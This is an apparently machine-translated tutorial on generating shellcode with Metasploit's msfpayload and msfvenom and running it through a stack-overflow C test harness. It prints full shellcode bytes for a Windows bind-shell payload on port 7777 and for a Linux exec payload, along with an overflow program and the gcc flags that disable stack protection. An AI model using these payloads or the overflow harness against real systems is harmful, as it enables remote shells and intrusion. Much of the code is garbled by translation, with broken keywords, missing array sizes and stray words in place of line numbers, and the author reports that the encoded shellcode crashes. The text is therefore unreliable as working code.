Overflow attack using Metasploit stacks-2

Basic stack overflow figure out that a very important issue in real-world attacks is shellcode generation.

Using the tools provided by Metasploit, you can easily generate Shellcode, which can then be validated using the code in the first article.

Let's start by saying how to generate Shellcode (all generated under BT5).

Example reference from: Http://www.offensive-security.com/metasploit-unleashed/Msfpayload

To view available payload:

[Email protected]:~# msfpayload-lframework Payloads (251Total )==============================Name Description----                                             -----------Aix/ppc/shell_bind_tcp Listen fora connection and spawn a command shell Aix/ppc/Shell_find_port Spawn A shell on an established connection Aix/ppc/shell_interact Simply execve/bin/SH( forinetd programs) Aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell BSD/sparc/shell_bind_tcp Listen fora connection and spawn a command shell...snip......snip ... windows/x64/shell/bind_tcp Listen fora connection (Windows x64), Spawn a piped command shell (Windows x64) (staged) Windows/x64/shell/reverse_tcp Connect back to the attacker (Windows x64), Spawn a piped command shell (Windows x64) ( Staged) Windows/x64/shell_bind_tcp Listen fora connection and spawn a command shell (Windows x64) Windows/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell (Windows x64) Windows/x64/vncinject/bind_tcp Listen fora connection (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged) Windows/x64/vncinject/reverse_tcp Connect back to the attacker (Windows x64), Inject a VNC Dll via a reflective lo Ader (Windows x64) (staged)

To view the specific payload parameter configuration:

[Email protected]:~# msfpayload windows/shell_bind_tcp o name:windows Command shell, bind TCP Inline module:payload/windows/shell_bind_tcp Version:14774platform:windows arch:x86needs admin:no Total size:341rank:normalprovided by:vlad902 SF Basic options:name current Setting Required Description----      ---------------  --------  -----------Exitfunc Process Yes Exit Technique:seh, thread, process, Nonelport4444Yes the Listen Portrhost no the target Addressdescription:listen  forA connection and spawn a command shell

Finally generate Shellcode, in the example above, generate C language available Shellcode:

[Email protected]:~# msfpayload windows/shell_bind_tcp lport=7777C/** windows/shell_bind_tcp-341 bytes *http://www.metasploit.com* Verbose=false, lport=7777, rhost=, exitfunc=process, * initialautorunscript=, autorunscript=*/unsignedCharBuf[] ="\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30""\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff""\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2""\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85""\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3""\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d""\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58""\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b""\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff""\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68""\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01""\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50""\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7""\x31\xdb\x53\x68\x02\x00\x1e\x61\x89\xe6\x6a\x10\x56\x57\x68""\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5""\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75""\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57""\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01""\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e""\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56""\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56""\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75""\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";

Of course we are in the Linux environment, we need to generate Linux-related shellcode, then we use the Exec payload to generate Shellcode:

[Email protected]:~# msfpayload linux/x86/exec cmd=lsC/** linux/x86/exec-38 bytes *http://www.metasploit.com* Verbose=false, Prependsetresuid=false, * prependsetreuid=false, Prependsetuid=false, * PrependChrootBreak=false , Appendexit=false, Cmd=ls*/unsignedCharBuf[] ="\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68""\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x6c""\x73\x00\x57\x53\x89\xe1\xcd\x80";

OK, now we can verify it in the shell.c of the previous section.

1#include <unistd.h>2 3UnsignedCharlarge_string[ -]; 4 /*5 * linux/x86/exec-38 bytes6  * http://www.metasploit.com7 * Verbose=false, Prependsetresuid=false,8 * Prependsetreuid=false, Prependsetuid=false,9 * Prependchrootbreak=false, Appendexit=false, Cmd=lsTen  */ OneUnsignedCharShellcode[] = A "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68" - "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03\x00\x00\x00\x6c" - "\x73\x00\x57\x53\x89\xe1\xcd\x80"; the  - void Main () { -     Charbuffer[ the];  -     inti; +     Long*long_ptr = (Long*) large_string;  -      for(i =0; I < sizeof (large_string)/sizeof (int); i++)  +* (long_ptr + i) = (int) buffer;  A  at      for(i =0; I < sizeof (shellcode); i++)  -Large_string[i] =Shellcode[i]; - memcpy (buffer,large_string,sizeof (large_string)); -}

Notice that 25 lines, I used memcpy to replace strcpy, because there are a few 00 of the generated shellcode.

Also use command compilation to generate validation:

gcc -fno-stack-protector-z execstack-g-o shell shell.c[email protected]:/mnt/hgfs/r/stack$./shell

For an example of how to avoid the inclusion of 00 in Shellcode, you can use Msfvenom, as in the example above:

[Email protected]:~# msfvenom-p linux/x86/exec cmd=ls-E X86/shikata_ga_nai-b'\x00'-F c[*] X86/shikata_ga_nai succeeded with size $(iteration=1) unsignedCharBuf[] ="\XDB\XD6\XD9\X74\X24\XF4\XBB\XE3\XA4\X6B\X7E\X58\X2B\XC9\XB1""\x0a\x83\xc0\x04\x31\x58\x15\x03\x58\x15\x01\x51\x01\x75\x9d""\x03\x84\xef\x75\x19\x4a\x79\x62\x09\xa3\x0a\x04\xca\xd3\xc3""\xb6\xa3\x4d\x95\xd5\x66\x7a\xa6\x19\x87\x7a\xc5\x6a\x87\x2d""\x46\x05\x66\x1c\xe8";

But there is a problem, the generated shellcode can not be exploited, will illegal instruction, causing core dump, unknown reason.

Overflow attack using Metasploit stacks-2